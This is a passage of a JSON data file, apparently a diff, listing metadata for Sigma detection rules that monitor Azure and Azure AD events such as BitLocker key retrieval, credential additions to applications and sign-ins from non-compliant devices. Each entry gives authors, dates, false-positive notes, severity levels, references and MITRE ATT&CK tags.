"refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml" - ], - "tags": [ - "attack.t1078" - ] - }, - "uuid": "8c944ecb-6970-4541-8496-be554b8e2846", - "value": "Successful Authentications From Countries You Do Not Operate Out Of" - }, - { - "description": "Detects when sign-ins increased by 10% or greater.", - "meta": { - "author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1'", - "creation_date": "2022/08/11", - "falsepositive": [ - "Unlikely" - ], - "filename": "azure_ad_auth_failure_increase.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_auth_failure_increase.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1078" - ] - }, - "uuid": "e1d02b53-c03c-4948-b11d-4d00cca49d03", - "value": "Increased Failed Authentications Of Any Type" - }, - { - "description": "Detects when successful sign-ins increased by 10% or greater.", - "meta": { - "author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton", - "creation_date": "2022/08/11", - "falsepositive": [ - "Increase of users in the environment" - ], - "filename": "azure_ad_auth_sucess_increase.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-successful-unusual-sign-ins", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_auth_sucess_increase.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1078" - ] - }, - "uuid": "67d5f8fc-8325-44e4-8f5f-7c0ac07cb5ae", - "value": "Measurable Increase Of Successful Authentications" - }, - { - "description": "Detect when authentications to important application(s) only required single-factor authentication", - "meta": { - "author": "MikeDuddington, '@dudders1'", - "creation_date": "2022/07/28", - "falsepositive": [ - "If this was approved by System Administrator." - ], - "filename": "azure_ad_auth_to_important_apps_using_single_factor_auth.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_auth_to_important_apps_using_single_factor_auth.yml" - ], - "tags": [ - "attack.t1078" - ] - }, - "uuid": "f272fb46-25f2-422c-b667-45837994980f", - "value": "Authentications To Important Apps Using Single Factor Authentication" - }, - { - "description": "Monitor and alert for Bitlocker key retrieval.", - "meta": { - "author": "Michael Epping, '@mepples21'", - "creation_date": "2022/06/28", - "falsepositive": [ - "Unknown" - ], - "filename": "azure_ad_bitlocker_key_retrieval.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#bitlocker-key-retrieval", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_bitlocker_key_retrieval.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1078" - ] - }, - "uuid": "a0413867-daf3-43dd-9245-734b3a787942", - "value": "Bitlocker Key Retrieval" - }, - { - "description": "Monitor and alert for device registration or join events where MFA was not performed.", - "meta": { - "author": "Michael Epping, '@mepples21'", - "creation_date": "2022/06/28", - "falsepositive": [ - "Unknown" - ], - "filename": "azure_ad_device_registration_or_join_without_mfa.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-registrations-and-joins-outside-policy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_device_registration_or_join_without_mfa.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1078" - ] - }, - "uuid": "5afa454e-030c-4ab4-9253-a90aa7fcc581", - "value": "Device Registration or Join Without MFA" - }, - { - "description": "Monitor and alert for changes to the device registration policy.", - "meta": { - "author": "Michael Epping, '@mepples21'", - "creation_date": "2022/06/28", - "falsepositive": [ - "Unknown" - ], - "filename": "azure_ad_device_registration_policy_changes.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-registrations-and-joins-outside-policy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_device_registration_policy_changes.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1484" - ] - }, - "uuid": "9494bff8-959f-4440-bbce-fb87a208d517", - "value": "Changes to Device Registration Policy" - }, - { - "description": "Detect failed authentications from countries you do not operate out of.", - "meta": { - "author": "MikeDuddington, '@dudders1'", - "creation_date": "2022/07/28", - "falsepositive": [ - "If this was approved by System Administrator." - ], - "filename": "azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml" - ], - "tags": [ - "attack.t1078" - ] - }, - "uuid": "28870ae4-6a13-4616-bd1a-235a7fad7458", - "value": "Failed Authentications From Countries You Do Not Operate Out Of" - }, - { - "description": "Detects guest users being invited to tenant by non-approved inviters", - "meta": { - "author": "MikeDuddington, '@dudders1'", - "creation_date": "2022/07/28", - "falsepositive": [ - "If this was approved by System Administrator." - ], - "filename": "azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml" - ], - "tags": [ - "attack.t1078" - ] - }, - "uuid": "4ad97bf5-a514-41a4-abd3-4f3455ad4865", - "value": "Guest Users Invited To Tenant By Non Approved Inviters" - }, - { - "description": "Detect when users are authenticating without MFA being required.", - "meta": { - "author": "MikeDuddington, '@dudders1'", - "creation_date": "2022/07/27", - "falsepositive": [ - "If this was approved by System Administrator." - ], - "filename": "azure_ad_only_single_factor_auth_required.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_only_single_factor_auth_required.yml" - ], - "tags": [ - "attack.t1078" - ] - }, - "uuid": "28eea407-28d7-4e42-b0be-575d5ba60b2c", - "value": "Azure AD Only Single Factor Authentication Required" - }, - { - "description": "Monitor and alert for sign-ins where the device was non-compliant.", - "meta": { - "author": "Michael Epping, '@mepples21'", - "creation_date": "2022/06/28", - "falsepositive": [ - "Unknown" - ], - "filename": "azure_ad_sign_ins_from_noncompliant_devices.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_sign_ins_from_noncompliant_devices.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1078" - ] - }, - "uuid": "4f77e1d7-3982-4ee0-8489-abf2d6b75284", - "value": "Sign-ins from Non-Compliant Devices" - }, - { - "description": "Monitor and alert for Sign-ins by unknown devices from non-Trusted locations.", - "meta": { - "author": "Michael Epping, '@mepples21'", - "creation_date": "2022/06/28", - "falsepositive": [ - "Unknown" - ], - "filename": "azure_ad_sign_ins_from_unknown_devices.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_sign_ins_from_unknown_devices.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1078" - ] - }, - "uuid": "4d136857-6a1a-432a-82fc-5dd497ee5e7c", - "value": "Sign-ins by Unknown Devices" - }, - { - "description": "Monitor and alert for users added to device admin roles.", - "meta": { - "author": "Michael Epping, '@mepples21'", - "creation_date": "2022/06/28", - "falsepositive": [ - "Unknown" - ], - "filename": "azure_ad_users_added_to_device_admin_roles.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-administrator-roles", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_users_added_to_device_admin_roles.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1078" - ] - }, - "uuid": "11c767ae-500b-423b-bae3-b234450736ed", - "value": "Users Added to Global or Device Admin Roles" - }, - { - "description": "User Added to an Administrator's Azure AD Role", - "meta": { - "author": "Raphaël CALVET, @MetallicHack", - "creation_date": "2021/10/04", - "falsepositive": [ - "PIM (Privileged Identity Management) generates this event each time 'eligible role' is enabled." - ], - "filename": "azure_ad_user_added_to_admin_role.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://attack.mitre.org/techniques/T1098/003/", - "https://m365internals.com/2021/07/13/what-ive-learned-from-doing-a-year-of-cloud-forensics-in-azure-ad/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_user_added_to_admin_role.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098.003" - ] - }, - "uuid": "ebbeb024-5b1d-4e16-9c0c-917f86c708a7", - "value": "User Added to an Administrator's Azure AD Role" - }, - { - "description": "Identifies when a application is deleted in Azure.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/03", - "falsepositive": [ - "Application being deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Application deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_application_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_application_deleted.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "410d2a41-1e6d-452f-85e5-abdd8257a823", - "value": "Azure Application Deleted" - }, - { - "description": "Identifies when a application gateway is modified or deleted.", - "meta": { - "author": "Austin Songer", - "creation_date": "2021/08/16", - "falsepositive": [ - "Application gateway being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Application gateway modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_application_gateway_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_application_gateway_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "ad87d14e-7599-4633-ba81-aeb60cfe8cd6", - "value": "Azure Application Gateway Modified or Deleted" - }, - { - "description": "Identifies when a application security group is modified or deleted.", - "meta": { - "author": "Austin Songer", - "creation_date": "2021/08/16", - "falsepositive": [ - "Application security group being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Application security group modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_application_security_group_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_application_security_group_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "835747f1-9329-40b5-9cc3-97d465754ce6", - "value": "Azure Application Security Group Modified or Deleted" - }, - { - "description": "Detects when a configuration change is made to an applications AppID URI.", - "meta": { - "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", - "creation_date": "2022/06/02", - "falsepositive": [ - "When and administrator is making legitimate AppID URI configuration changes to an application. This should be a planned event." - ], - "filename": "azure_app_appid_uri_changes.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#appid-uri-added-modified-or-removed", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_appid_uri_changes.yml" - ], - "tags": [ - "attack.t1528", - "attack.persistence", - "attack.credential_access" - ] - }, - "uuid": "1b45b0d1-773f-4f23-aedc-814b759563b1", - "value": "Application AppID Uri Configuration Changes" - }, - { - "description": "Detects when a new credential is added to an existing application. Any additional credentials added outside of expected processes could be a malicious actor using those credentials.", - "meta": { - "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", - "creation_date": "2022/05/26", - "falsepositive": [ - "When credentials are added/removed as part of the normal working hours/workflows" - ], - "filename": "azure_app_credential_added.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-credentials", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_credential_added.yml" - ], - "tags": [ - "attack.t1098", - "attack.persistence" - ] - }, - "uuid": "cbb67ecc-fb70-4467-9350-c910bdf7c628", - "value": "Added Credentials to Existing Application" - }, - { - "description": "Identifies when a application credential is modified.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/02", - "falsepositive": [ - "Application credential added may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Application credential added from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_app_credential_modification.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://www.cloud-architekt.net/auditing-of-msi-and-service-principals/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_credential_modification.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "cdeef967-f9a1-4375-90ee-6978c5f23974", - "value": "Azure Application Credential Modified" - }, - { - "description": "Detects when highly privileged delegated permissions are granted on behalf of all users", - "meta": { - "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", - "creation_date": "2022/07/28", - "falsepositive": [ - "When the permission is legitimately needed for the app" - ], - "filename": "azure_app_delegated_permissions_all_users.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_delegated_permissions_all_users.yml" - ], - "tags": [ - "attack.privilege_escalation" - ] - }, - "uuid": "a6355fbe-f36f-45d8-8efc-ab42465cbc52", - "value": "Delegated Permissions Granted For All Users" - }, - { - "description": "Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments.\nIf this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted.\nThis can be a misconfigured application or potentially something malicious.\n", - "meta": { - "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", - "creation_date": "2022/06/01", - "falsepositive": [ - "Applications that are input constrained will need to use device code flow and are valid authentications." - ], - "filename": "azure_app_device_code_authentication.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_device_code_authentication.yml" - ], - "tags": [ - "attack.t1078", - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.initial_access" - ] - }, - "uuid": "248649b7-d64f-46f0-9fb2-a52774166fb5", - "value": "Application Using Device Code Authentication Flow" - }, - { - "description": "Detects when an end user consents to an application", - "meta": { - "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", - "creation_date": "2022/07/28", - "falsepositive": [ - "Unknown" - ], - "filename": "azure_app_end_user_consent.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#end-user-consent", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_end_user_consent.yml" - ], - "tags": [ - "attack.privilege_escalation" - ] - }, - "uuid": "9b2cc4c4-2ad4-416d-8e8e-ee6aa6f5035a", - "value": "End User Consent" - }, - { - "description": "Detects when end user consent is blocked due to risk-based consent.", - "meta": { - "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", - "creation_date": "2022/07/10", - "falsepositive": [ - "Unknown" - ], - "filename": "azure_app_end_user_consent_blocked.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#end-user-stopped-due-to-risk-based-consent", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_end_user_consent_blocked.yml" - ], - "tags": [ - "attack.privilege_escalation" - ] - }, - "uuid": "7091372f-623c-4293-bc37-20c32b3492be", - "value": "End User Consent Blocked" - }, - { - "description": "Detects when a new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application.", - "meta": { - "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", - "creation_date": "2022/06/02", - "falsepositive": [ - "When a new application owner is added by an administrator" - ], - "filename": "azure_app_owner_added.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#new-owner", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_owner_added.yml" - ], - "tags": [ - "attack.t1528", - "attack.persistence", - "attack.credential_access", - "attack.defense_evasion" - ] - }, - "uuid": "74298991-9fc4-460e-a92e-511aa60baec1", - "value": "Added Owner To Application" - }, - { - "description": "Detects when app permissions (app roles) for other APIs are granted", - "meta": { - "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", - "creation_date": "2022/07/28", - "falsepositive": [ - "When the permission is legitimately needed for the app" - ], - "filename": "azure_app_permissions_for_api.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_permissions_for_api.yml" - ], - "tags": [ - "attack.privilege_escalation" - ] - }, - "uuid": "ba2a7c80-027b-460f-92e2-57d113897dbc", - "value": "App Permissions Granted For Other APIs" - }, - { - "description": "Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, Sharepoint, or Azure AD", - "meta": { - "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", - "creation_date": "2022/07/10", - "falsepositive": [ - "When the permission is legitimately needed for the app" - ], - "filename": "azure_app_permissions_msft.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_permissions_msft.yml" - ], - "tags": [ - "attack.privilege_escalation" - ] - }, - "uuid": "c1d147ae-a951-48e5-8b41-dcd0170c7213", - "value": "App Granted Microsoft Permissions" - }, - { - "description": "Detects when administrator grants either application permissions (app roles) or highly privileged delegated permissions", - "meta": { - "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", - "creation_date": "2022/07/28", - "falsepositive": [ - "When the permission is legitimately needed for the app" - ], - "filename": "azure_app_privileged_permissions.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "microsoft365portal", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_privileged_permissions.yml" - ], - "tags": [ - "attack.privilege_escalation" - ] - }, - "uuid": "5aecf3d5-f8a0-48e7-99be-3a759df7358f", - "value": "App Granted Privileged Delegated Or App Permissions" - }, - { - "description": "Detects when an app is assigned Azure AD roles, such as global adminsitrator, or Azure RBAC roles, such as subscription owner.", - "meta": { - "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", - "creation_date": "2022/07/19", - "falsepositive": [ - "When the permission is legitimately needed for the app" - ], - "filename": "azure_app_role_added.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#service-principal-assigned-to-a-role", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_role_added.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "b04934b2-0a68-4845-8a19-bdfed3a68a7a", - "value": "App Role Added" - }, - { - "description": "Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly.\nThe application then uses those credentials to authenticate the user against the identity provider.\n", - "meta": { - "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", - "creation_date": "2022/06/01", - "falsepositive": [ - "Applications that are being used as part of automated testing or a legacy application that cannot use any other modern authentication flow" - ], - "filename": "azure_app_ropc_authentication.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_ropc_authentication.yml" - ], - "tags": [ - "attack.t1078", - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.initial_access" - ] - }, - "uuid": "55695bc0-c8cf-461f-a379-2535f563c854", - "value": "Applications That Are Using ROPC Authentication Flow" - }, - { - "description": "Detects when a configuration change is made to an applications URI.\nURIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated.\n", - "meta": { - "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", - "creation_date": "2022/06/02", - "falsepositive": [ - "When and administrator is making legitimate URI configuration changes to an application. This should be a planned event." - ], - "filename": "azure_app_uri_modifications.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-configuration-changes", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_uri_modifications.yml" - ], - "tags": [ - "attack.t1528", - "attack.persistence", - "attack.credential_access" - ] - }, - "uuid": "0055ad1f-be85-4798-83cf-a6da17c993b3", - "value": "Application URI Configuration Changes" - }, - { - "description": "Detects when an account is disabled or blocked for sign in but tried to log in", - "meta": { - "author": "Yochana Henderson, '@Yochana-H'", - "creation_date": "2022/06/17", - "falsepositive": [ - "Account disabled or blocked in error", - "Automation account has been blocked or disabled" - ], - "filename": "azure_blocked_account_attempt.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_blocked_account_attempt.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110" - ] - }, - "uuid": "4afac85c-224a-4dd7-b1af-8da40e1c60bd", - "value": "Account Disabled or Blocked for Sign in Attempts" - }, - { - "description": "Change to authentication method could be an indicated of an attacker adding an auth method to the account so they can have continued access.", - "meta": { - "author": "AlertIQ", - "creation_date": "2021/10/10", - "falsepositive": [ - "Unknown" - ], - "filename": "azure_change_to_authentication_method.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_change_to_authentication_method.yml" - ], - "tags": [ - "attack.credential_access" - ] - }, - "uuid": "4d78a000-ab52-4564-88a5-7ab5242b20c7", - "value": "Change to Authentication Method" - }, - { - "description": "Define a baseline threshold for failed sign-ins due to Conditional Access failures", - "meta": { - "author": "Yochana Henderson, '@Yochana-H'", - "creation_date": "2022/06/01", - "falsepositive": [ - "Service Account misconfigured", - "Misconfigured Systems", - "Vulnerability Scanners" - ], - "filename": "azure_conditional_access_failure.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_conditional_access_failure.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110" - ] - }, - "uuid": "b4a6d707-9430-4f5f-af68-0337f52d5c42", - "value": "Sign-in Failure Due to Conditional Access Requirements Not Met" - }, - { - "description": "Detects when a Container Registry is created or deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/07", - "falsepositive": [ - "Container Registry being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Container Registry created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_container_registry_created_or_deleted.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_container_registry_created_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "93e0ef48-37c8-49ed-a02c-038aab23628e", - "value": "Azure Container Registry Created or Deleted" - }, - { - "description": "Number of VM creations or deployment activities occur in Azure via the azureactivity log.", - "meta": { - "author": "sawwinnnaung", - "creation_date": "2020/05/07", - "falsepositive": [ - "Valid change" - ], - "filename": "azure_creating_number_of_resources_detection.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Creating_Anomalous_Number_Of_Resources_detection.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_creating_number_of_resources_detection.yml" - ], - "tags": [ - "attack.t1098" - ] - }, - "uuid": "d2d901db-7a75-45a1-bc39-0cbf00812192", - "value": "Number Of Resource Creation Or Deployment Activities" - }, - { - "description": "Identifies when a device in azure is no longer managed or compliant", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/03", - "falsepositive": [ - "Administrator may have forgotten to review the device." - ], - "filename": "azure_device_no_longer_managed_or_compliant.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_device_no_longer_managed_or_compliant.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "542b9912-c01f-4e3f-89a8-014c48cdca7d", - "value": "Azure Device No Longer Managed or Compliant" - }, - { - "description": "Identifies when a device or device configuration in azure is modified or deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/03", - "falsepositive": [ - "Device or device configuration being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Device or device configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_device_or_configuration_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_device_or_configuration_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "46530378-f9db-4af9-a9e5-889c177d3881", - "value": "Azure Device or Configuration Modified or Deleted" - }, - { - "description": "Identifies when DNS zone is modified or deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/08", - "falsepositive": [ - "DNS zone modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "DNS zone 